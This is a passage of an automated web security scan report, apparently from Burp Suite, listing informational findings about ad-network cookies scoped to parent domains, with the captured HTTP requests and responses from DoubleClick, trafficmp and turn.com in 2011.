Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUSEtGmJ_d6tEMmF6Ld72CP1yPoOsDA3gBY2BgYGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo357ZZkvA9PkUAZWhycMjDp5DAwfhf4DAUguP4CxmoHJ34aB5YU3A6MWEwPDpWcwfWnKs4KAclZQOUag3AO4nJKUOpANBr6bMxgY2BkYAm8xMgEVMRgwMgApBTMwtbQALMiSycgKFGQJYWJlZAMy5HcxMrDBHQc2BgAF6CFI

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUelvbcSQnrAxyasYlpB02IBM3QRUDA3gBY2BgYGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo357ZZkvA9PkUAZWhycMjDp5DAwfhf4DAUguP4CxmoHJ34aB5YU3A6MWEwPDpWcwfWnKs4KAclZQOUag3AO4nJKUOpDNiNPOOpNlQHkG380ZDAwcQIfsZAQqZgi8xcgEpBgMwDwFMzC1tAAsyJLJyAqUYwlhYmVkAzLkdzEysIHdX2eyAmQWAwMAIV8oiw--; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 12:31:25 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http://pub.retailer-amazon.net/banner_120_600_a.php/clickenc=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE&num=1&sig=AGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A&client=ca-pub-6888065668292638&adurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
Content-Length: 0
Date: Sun, 24 Apr 2011 12:31:25 GMT


17.9. http://ad.doubleclick.net/activity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /activity;src=2700844;dcnet=3973;boom=47663;sz=1x1;ord=6105494023587552?&_dc_ck=try HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
X-Dclk-Inred-Response-Type: None
Content-Length: 43
Set-Cookie: id=cbaa89636000051||t=1303692839|et=730|cs=3xubq1go; path=/; domain=.doubleclick.net; expires=Wed, 24 Apr 2013 00:53:59 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 24 Apr 2011 00:53:59 GMT
Date: Mon, 25 Apr 2011 00:53:59 GMT
Server: GFE/2.0
Expires: Mon, 25 Apr 2011 00:53:59 GMT

GIF89a.............!.......,...........L..;

17.10. http://ad.doubleclick.net/adj/N3382.dogtimemedia.comOX6462/B5304363.9  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3382.dogtimemedia.comOX6462/B5304363.9

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N3382.dogtimemedia.comOX6462/B5304363.9;sz=300x250;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=911256%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=2%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=2%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bo%3D20%3By%3D5%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord=0.21931676924550902? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6404
Set-Cookie: id=c51bf923600009b||t=1303663573|et=730|cs=jppc_u-3; path=/; domain=.doubleclick.net; expires=Tue, 23 Apr 2013 16:46:13 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 23 Apr 2011 16:46:13 GMT
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 16:46:13 GMT
Expires: Sun, 24 Apr 2011 16:46:13 GMT
Discarded: true

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Mar 09 18:59:42 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...

17.11. http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5831.132349.1555557534521/B4835684.28

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929089%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=0%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=0%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bk%3D;ord=0.2388243748997535? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5427
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 24 Apr 2011 17:00:59 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 16:45:59 GMT
Expires: Sun, 24 Apr 2011 16:45:59 GMT
Discarded: true

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...

17.12. http://ad.doubleclick.net/adj/inet.hostcat/_default  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/inet.hostcat/_default

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/inet.hostcat/_default;sz=300x250;ord=9266033005085678? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 343
Set-Cookie: id=c4d9990360000f2||t=1303646982|et=730|cs=mtzrl3ts; path=/; domain=.doubleclick.net; expires=Tue, 23 Apr 2013 12:09:42 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 23 Apr 2011 12:09:42 GMT
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 12:09:42 GMT
Expires: Sun, 24 Apr 2011 12:09:42 GMT
Discarded: true

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af3/0/0/%2a/j;233907841;0-0;0;20874861;4307-300/250;22858237/22876120/1;;~sscs=%3fhttp://hostvoice.com/affordable-budget-
...[SNIP]...

17.13. http://ad.doubleclick.net/clk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clk;225724241;49552626;h;u=ds&sv1=120467130&sv2=2011042473&sv3=295510;%3fhttp://equifax.com/free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://equifax.com/free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA
Set-Cookie: id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; path=/; domain=.doubleclick.net; expires=Tue, 16 Apr 2013 20:37:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 24 Apr 2011 19:52:53 GMT
Server: GFE/2.0
Content-Type: text/html


17.14. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=1470&id=1&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://equifax.com/free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T_gtgz=7p9%3A0%3A1; rth=2-ljzkpb-7p9~0~1~1-; uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Sun, 24 Apr 2011 19:54:51 GMT
Location: http://www.googleadservices.com/pagead/conversion/1046365390/?label=NV0xCI681gEQzon58gM&amp;guid=ON&amp;script=0
Connection: close
Set-Cookie: T_gtgz=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_c0mw=dlx%3A6pa4%3A1; Domain=trafficmp.com; Expires=Mon, 23-Apr-2012 19:54:51 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-dlx~6pa4~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Mon, 23-Apr-2012 19:54:51 GMT; Path=/
Content-Length: 0


17.15. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689665&l=728x90&aid=25818769&ahcid=986337&bimpd=fvqWk9E7aKARqlPGoosJXpdA8tM0WuoTZOFWbt8juMrkbYeyOJZYseXQhJl-D8dZ1W8j3AWyyRt_S4xWx1Wocq9niBJoz6621irB3f190hVoi5oxQPyCItoVSlkU2GiEKa7xi-Yh-L5zIgjO7n9XM9W-SvPVZ9uvWN6QKCcGWsFt1AnXVvRUHCS3x0AwhdfJrH0SK8FW6VcT2pkB7RfPtoc5ouwqR_rUxEmpjLbn_kGIlmyImarU-piwr0Jt0WhoGLqsZmaJeMzvP2wO9dmfzLdujv620HmwyC87B22XsEDnjvFkbfDhOTBqKi71LuQkPN61H_pRF_QxxnLkwBnFkRrRdyRa2Vn_6BjzH-FFxuCiWvQM-mTsg-ZlkzhHNNwTCcJzEb1qj5xmeir2G5gfeX3im_YGwEoKshG4ob_yn457bS2HEfMO6qa0Gwjcoyk4eB3x2ve04_d-saB0rPeqGTn1FAv89x4axE5Jcvz3NtGNXHmwdmZPdbayfYow3TS_pRffsD1QMAPrsB9Edfeqxoyc-pC_2W_bc6ewxhFwGvHUoPaaHnaoorULvxTzi44m1_Si-euS0zvZ4Sy6x3y4oBWPJSpYQc9hMA6Upo39y-px8dz54g50gXlKFn0w_61FWrucAA4n2-3CMAbQ96XgsdMp68CY-i0F0mEcU4d3dpJcURMhRM2LhpW-3_PATP0lCcTuEpgm1oB6Mt98YrnVmAXvL6koORN8ahDMn98RAsmwrRTD9o2SJxjqGPytYYwfCTWuOI6iK62k4xtoN-1-5A&acp=TbRAZAAC2tsK5XbqIPpc8lxQHpbwNolfLMpt4g&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBipcRZEC0Tdu1C-rtlQfyuemHAsCshNAB-KLb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEJNzI4eDkwX2FzyAEJ2gFIaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl83MjhfOTBfYi5waHA_c2VhcmNoPSU3QiRrZXl3b3JkJTdEmAJkwAIEyALsk-kJqAMB6AO8AegDlAL1AwAAAMSABuHh9obM1uH8Ww%26num%3D1%26sig%3DAGiWqtyMckh3wZa7xNgeCD_9yTTL6zDYkw%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676599&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658599151&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303658599159&frm=1&adk=513358139&ga_vid=955713783.1303658599&ga_sid=1303658599&ga_hid=1255304632&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2931142961646634775; adImpCount=ccLvK9U7QtRdQShOfq29UyRA0hWOzjunjXltn4Ro0wLfaqaDzVRu9ZiuBStYaftY77DtXuOsguLFXai3AhFvnPZsdOWLg55db-rGyslK6Hn4Gsu4bgzX3HPXF8aZ-svzaHqjEn6Y89hUb1ebcReTqO0G0mfFUdQh0TS12QC5rdd0SKdPzhEKaKWeI5Yx2N7aA81RFV7Ju3REEBkpNZET3_AH03m22f6LSucPu24XFtbJoH4cOuvYUlTkCNcoKzYAk3NUPm8pwlGf5Ch1PutwrWnSvjM6YIyaPo076xrJcUNwbiSZqdEKL6qcppfxujGOl00l94DPr57wWUBTyRbAx6SFM-Ia8iW6v4r--R4cQ0vlVHWJOdM_ZTcKgFSOlW-v76c4pTy1x4tO_Sj_92V_c9l9yJcRs-_HV2FNNdqgmWKwzOueNcvo-1XmGz_MBiuXyjJSUibZ2BHh2T3FSfjGAITyiawrkOih_FdqW5ZHwRtMNQF2iyMUjVL7ttzR-BfUzv-eZrtlUUUI4c_78m_3_c5cySrnTOh9dMxUw7WE-ja_3nZQmNNcCcp3_wtIWynWBXJ7BVYb5SQq17PzxVE1C6477_djhhS3SPkBUOiwXvN2UB-mbqJWj3F9DmOa47ugri-pvt5MhqWaQjjpMBxrbP88WWl0G0-IGYzqbaILcNa3VMZDZgEWVs3Qz2BttiQfQ912etMxHez7HFbRYJQYust_BLX_n2e0dL-0aj8mixtcWuh9OwP5WPMPXscRpCIMFJd1V6hK_6XZdSXRi1-9fBCyOg31PpLP2jtWuqGVpHCpDjfslrVyDxMBDlIppEJHn4tBFuPx-iDBchd3Xj-d6mnSvjM6YIyaPo076xrJcUPFlP5zO97faJzZ1aEtSW6dEc4daKu1RR2_0SqsSvHV96fpCL8Eb_AKATM_EJjD9j33kP4Nrko0okcXRXUghtRr76c4pTy1x4tO_Sj_92V_cwkPlA1bugHQgsNwNUN2EW3vp6h1m4YoN9gfv5UHXFQ2IC2DhdDGl4eOo_AeA0QhrRR8ZQb2LnR0fR8FdQf63bxMNQF2iyMUjVL7ttzR-BfUCSUxGKV05l1cGmXYc-J8685cySrnTOh9dMxUw7WE-jawGQoklAJzdveKdvZB8xorXil4TWqZs2Fc7APxLqKkAa477_djhhS3SPkBUOiwXvP23sgE4QizgtxzDeUH6ed8ri-pvt5MhqWaQjjpMBxrbGAV0u7jnu-eT7fscIjrTHjekC0SQGeXG_xb5T35Ss4efvOlTreFo8nIhLOXDY0psSnAQFqLbCQVMKL0SHYQuupcWuh9OwP5WPMPXscRpCIME_H2_mgzLFa4hlL8c6saRH0j2kee9z_x-ARl44ojjAapDjfslrVyDxMBDlIppEJHAtEJaHH6FiwpVk1TbTCs4Pz02zxgwih1t32hJDzR2iRXwQ3_DbEzpjmCmVHD87QzadK-MzpgjJo-jTvrGslxQwHGaeF-WAjW7mJndH2YOVwnmSpuC_J3YHxfjAKmX_B04URqqaHNzgB7E6-VsRza8HA3VcuutiZOC52FKO3yoHzvpzilPLXHi079KP_3ZX9zjadLD_W4Qk25QaIl2BiwNWYjiJWk9aQzyVLZH2OXmNbKV1B7NBMN8fr3nrJxtWo7FLj2bFHEeYmREZSg8ADBFkw1AXaLIxSNUvu23NH4F9SkzNOjGWKQGeKTtJ4HtrvVzlzJKudM6H10zFTDtYT6NqjNrOxeF8jsNeArRzd1s-x6ni1qbTBwW4MUEN1JdpM3rjvv92OGFLdI-QFQ6LBe87RxY6maGdv72eHuIFUDWKyuL6m-3kyGpZpCOOkwHGtsTJv5rtLhQ6dRr4jL8-o8Q68bcUqbFMpI-C-npTlLMx1SiOGlfTWtXL36ePiOy9aUQjiE1VNrAoqhhI_BVRY4D1xa6H07A_lY8w9exxGkIgzb_uapo_3GEjtQiNCUDA8sLPlqlRXWjl7eyI_CFu0hP2ckgCGSuiZNCnk1aHQCYkCgXmHzsmMRGgA0PrWVAGQ9adK-MzpgjJo-jTvrGslxQ7m6MVSNRUpqQ2D-10cypClv9BiYngppqZAgOJPk3JR32_hjlieDEGkxFdag2l_Aoc92R9o7AwpEl_z76FPzBpnvpzilPLXHi079KP_3ZX9zDTgBGp5IRkjrCAJTV8ZVAh1hJ3Lx2jTH6Z2vbSJvJVj_wcYOmG1ekAJmxsrcnmB-BBip3t4loip6gpJE7PRXhUw1AXaLIxSNUvu23NH4F9RPZZPOeGksgK52Qk4Yl60ozlzJKudM6H10zFTDtYT6NjElSgtlUCOcJy3pQW5jN33Kfmv5vVtdGhz4fVjqsFSY2Q24GDIb9Ig_sE3JF_KtqXxT5SmcZWzceN7XXcpz3Laj1iqJAw0pRiPxGBAqA2RguFxSuIusHqs-ANeRqI2eX0-W1jQPyJ9G5swrvmSFjnv5CByYP35e21Aw1IYnm6BihTKE7NZh8XhewTjqO8PhyAWwnurw8UZTM80oyuw1nZlP-zJhZZ-Q1bjRitacbaxOVTP9qcmAVf1O57ebp5SQNZSGXGpVGHhUYdpuUFiTjAlIA6qqP3BKO_N7QLYJ3-V2JF1diQSQ1nvXkYY9WDOjGVCWFcKk0OcK1paod2fc3z9PTR76F7aRbqUZNhA6AnczEot1eKTaALu3bxsky_SF7xrqIY4uIILMFgOWc-MUVQGUh5NYki1nFLjbBW-SMmWII58FWMHxHN9h4DqRCViFvMbXDpwiPTREhuOK4UpMWBgaaKd8aPfSclggHpvcnj1rTQa547WaZ7vej-BKaHXRnSiWKGazF07-sb9WbMJcB69Uzu4XKtxm-arTbtpAldmp8flrd8Pliv5vI_mjE9mWMY8KwsEwgd20k5ELAKwe3k279Aus6b5L4_NZc9G2gsPjvykZyrZ0lJbepgbY9J6LUbR3eEBbRxGTiyMX7kM5_NYwE2eVqCLcXBoZRYALyknr3LMopBM3AO5sKxGXe66Xcf1bUBS5gLuXGklliOTAkJuZ294oTg07S25wzyY5hqce37GgssTXYn2Xq8BZZgg2HObpk1xG3bToP3rXxzkj99ob5G0iiG2c_fr_eXLG84IsFvl6CwW7WMzXN4Hy5VoXWdaDuBsa5-28Mf8id0a4QFFD8ZqHLAvGnCoQ5AOuBKm4L9PTq1WYbcqAhEgQ83H5jMT6_nHF-Y8EU68DntCrjSQhIAIJkqhLZq2eZKjN4-l1K9pctvwsmq0JVN5pjnr7Cfg7jEMAhNszr5vuhm7M1ncvWgg4Yu1PCxkrNZyc-7VV-X_mx9F_7A7hdJLrSJaQwEjFn7eCNBMEz5wEn4z2HwUeSE9GcePbxvwdOT2mw813dZLTgxswKbPWb5-ti9vvM3TUADBPX2cC3KvSE-hYOcql6PYaa2Yof4H8ZbNEXKfxVWD_EqNwcSG3SB7DIjAFUePeH61RVAavNz6UfSwJ9-LZSLv5mnE5HrFnrMAJuA2Ehz39nqEfupWDpbXsEB9HKrCY6EDv-NGLxdTyLmLO0Agh-ExB6IF4sY8Tq5KqaEWYITXkUKx3KsUe2Po5SVOIqioXp52XStQPhMwXyt2Ad5s; fc=kZobV0mv2OChfkn6NxQs5IZGf83ZoUpCw_-LIwCF6JKXj2VWkQs_pZe2x4BlBj3dlN1QdeW4zlTZ3FmFjhpKQWfGrPx0K-SOL3w7moPxVd8PpZsczLZg-X3ewhfnbE_kaq3VcZ9RZeFJ5DmVciVRNT-17uf2fQ8lD0LtIx6_Iq4; pf=NorDLowqwpEErYS1IRlXOCfhHOczs2r3pVTqk5-dp_aS04H7stKnZdMqlx3yK2bUcy-iZ5wUC35PPQSMEVdkipxKMUvxbd3f4Da9CFOTnTLWCQKR_r6qY54lFjJbA4MKo2PgnaN3rNEZPcj1JP_yFl3OnJaEawY-HzaiUFPHnzHCJURYTll9YSZFjFvcZECT7ANZN-zFyB3LaaiNSQAne-eUjAeuFexCQpSIGGE-hCu26aZc5sDc4UJmeMYA4wA4zO05pHI-TuL2Zs_aTFBxV5zGyX9gCVIJL41fXCewMtGIOTObyhw6XI9NsuIQ3LHMPwDuZeCTmjbOJ12_tYZY7qYaNMhlV9JYPNAa9WJ26feij1a04Z4aJbTbeEF7HREPS4iF2IFkJR-IDjmCPDngrg; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 15:23:17 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:17 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=IOm-9eUfzJE5t64hRDIt0zc_YOOYoH5iAoJDp0qhYG-Y481wEkFtGX7HudJA1SwJ77DtXuOsguLFXai3AhFvnPZsdOWLg55db-rGyslK6Hn4Gsu4bgzX3HPXF8aZ-svzaHqjEn6Y89hUb1ebcReTqO0G0mfFUdQh0TS12QC5rdd_NeHpirdcMFfI8fO5dnT_PLrZwiRGgyh_MJR-M-ApSJyckovI9VBGSzpZfR8FHPdSSO3kAipW9Q9kWLZ-MJl_BrftuWyTDvwUtbSpm9eZvGnSvjM6YIyaPo076xrJcUO8BVXP0P0kDQBcxYVqJq4WnUL9zFp76gzRF15RP8Q9KIyZ74aPux2C99RMycWzdi7GLYP54sbK8T8cZhoeBWYu76c4pTy1x4tO_Sj_92V_c9yNIOBYB9A2wOEs8WKRPUcOtA-yYJHFrReS8rj8aZLb39uQ1iPta8Wrn8c58UAYuso-Mc3i4V4Q0Y9NWCrnbQJMNQF2iyMUjVL7ttzR-BfUbHKSnkYu9iMX4qj0tqHHks5cySrnTOh9dMxUw7WE-jbOz16PuTPjhPfxJX8Ty59Sj7f8ibFTFhojQbBB5-JlSq477_djhhS3SPkBUOiwXvOi5Fgu10En2_NiR79s1111ri-pvt5MhqWaQjjpMBxrbLFKZnmTCPh4wDgOEmr_jJxHE0nhTFNONjqHgUYm4FpRfvOlTreFo8nIhLOXDY0psZuqfgOi4oylyQlDcE1kSHJcWuh9OwP5WPMPXscRpCIMCnCxyGugHBE9FTQ_IvAvZIN9Q_fjvM40K0xc0YEcl4L89Ns8YMIodbd9oSQ80dok4XSyCFv6qiNgfItGth8yYGnSvjM6YIyaPo076xrJcUNhggDeUdfGoPZJlKeW4R1HEc4daKu1RR2_0SqsSvHV93nRLZ7BQJ3BesUmQ_jjYmjVSEyKGxHSEDBn